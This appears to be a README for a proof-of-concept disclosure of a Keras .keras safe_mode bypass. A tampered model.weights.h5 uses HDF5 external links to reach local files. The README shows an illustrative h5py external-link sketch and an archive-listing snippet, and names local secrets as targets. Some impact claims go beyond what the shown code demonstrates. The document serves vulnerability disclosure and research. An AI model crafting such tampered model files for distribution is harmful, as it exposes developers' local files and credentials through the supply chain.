This repo is a proof of concept for a vulnerability I found in how the modern .keras format handles weights. Even with safe_mode=True, the model loader still lets the underlying HDF5 driver resolve external links. That means a malicious model can "point" at files on the local system (like /etc/hostname) and read their contents into the model session.
Setup
The exploit_model.keras file is actually a zip archive. Inside it, model.weights.h5 has been modified to contain an HDF5 external link. When Keras loads the weights, it follows that link out to the host's local files. This bypasses the Python-level safety checks because the "leak" happens lower down, inside the HDF5 library itself.
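The external-link mechanism itself can be sketched with h5py. This is a minimal, self-contained illustration, not the actual payload from this repo: the file names and the "target" file are placeholders standing in for the tampered model.weights.h5 and a file on the victim's disk.

```python
import os
import tempfile

import h5py

workdir = tempfile.mkdtemp()
target = os.path.join(workdir, "target.h5")    # stands in for a file on the victim's machine
carrier = os.path.join(workdir, "weights.h5")  # stands in for the tampered model.weights.h5

# A file holding data the attacker wants to reach.
with h5py.File(target, "w") as f:
    f["data"] = [1, 2, 3]

# The carrier file contains no data of its own, only an external link
# pointing at the other file by path.
with h5py.File(carrier, "w") as f:
    f["leak"] = h5py.ExternalLink(target, "/data")

# Any reader that follows links (the HDF5 C library does by default)
# transparently pulls in the linked file's contents.
with h5py.File(carrier, "r") as f:
    print(f["leak"][:].tolist())  # → [1, 2, 3]
```

The key point is that the link resolution happens inside the HDF5 C library when the dataset is accessed, below anything a Python-side safe_mode check can see.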
Procedure
- Grab the code3.py file from this repo.
- Then run tcn2.py (or a similar trigger, adjusted to your setup/test case) from this same repo.
Impact
This is a pretty big deal for supply-chain security. If a developer downloads a "pre-trained" model, that model could read their env vars, config files, or SSH keys simply by being loaded. It breaks the trust people place in the new .keras format as a safe serialization format.
Check the exploit_model.keras file
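Since a .keras file is a plain zip archive, its layout can be inspected with the standard library alone. The sketch below builds a stand-in archive (the actual exploit_model.keras lives in the repo, not here); real .keras archives contain config.json, metadata.json, and model.weights.h5.

```python
import io
import zipfile

# Stand-in for exploit_model.keras: a .keras file is just a zip archive.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("config.json", "{}")
    z.writestr("metadata.json", "{}")
    z.writestr("model.weights.h5", b"...")  # the tampered HDF5 payload lives here

# Listing the archive shows the member that carries the external link.
with zipfile.ZipFile(buf) as z:
    print(z.namelist())  # → ['config.json', 'metadata.json', 'model.weights.h5']
```

Against the real file, `zipfile.ZipFile("exploit_model.keras").namelist()` shows the same layout, and extracting model.weights.h5 lets you examine the link with HDF5 tools.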

